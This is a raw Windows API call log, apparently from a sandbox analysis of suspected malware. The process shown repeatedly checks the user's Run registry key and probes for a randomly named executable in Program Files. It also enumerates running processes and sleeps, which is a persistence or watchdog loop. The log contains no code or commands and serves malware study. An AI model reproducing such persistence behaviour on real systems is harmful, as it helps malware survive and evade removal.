0x0 [0171.410] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.411] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.411] NtClose (Handle=0x270) returned 0x0 [0171.411] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.412] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.412] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700538) returned 1 [0171.412] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.412] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.412] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7003d0) returned 1 [0171.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.454] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.456] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.456] NtClose (Handle=0x270) returned 0x0 [0171.456] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.456] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.457] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700358) returned 1 [0171.457] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.457] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.457] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffea8) returned 1 [0171.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.467] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.517] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.518] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.519] NtClose (Handle=0x270) returned 0x0 [0171.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.519] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.519] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffdb8) returned 1 [0171.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.519] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.519] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700628) returned 1 [0171.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.541] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.543] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.543] NtClose (Handle=0x270) returned 0x0 [0171.543] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.543] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.543] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7008f8) returned 1 [0171.543] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.543] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.543] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fff20) returned 1 [0171.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.568] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.570] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.570] NtClose (Handle=0x270) returned 0x0 [0171.570] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.570] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.570] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffdb8) returned 1 [0171.570] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.571] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.571] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700b50) returned 1 [0171.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.599] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.601] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.601] NtClose (Handle=0x270) returned 0x0 [0171.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.601] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.601] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7003d0) returned 1 [0171.601] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.601] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.602] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700b50) returned 1 [0171.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.621] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.622] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.622] NtClose (Handle=0x270) returned 0x0 [0171.623] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.623] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.623] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fff98) returned 1 [0171.623] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.623] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a 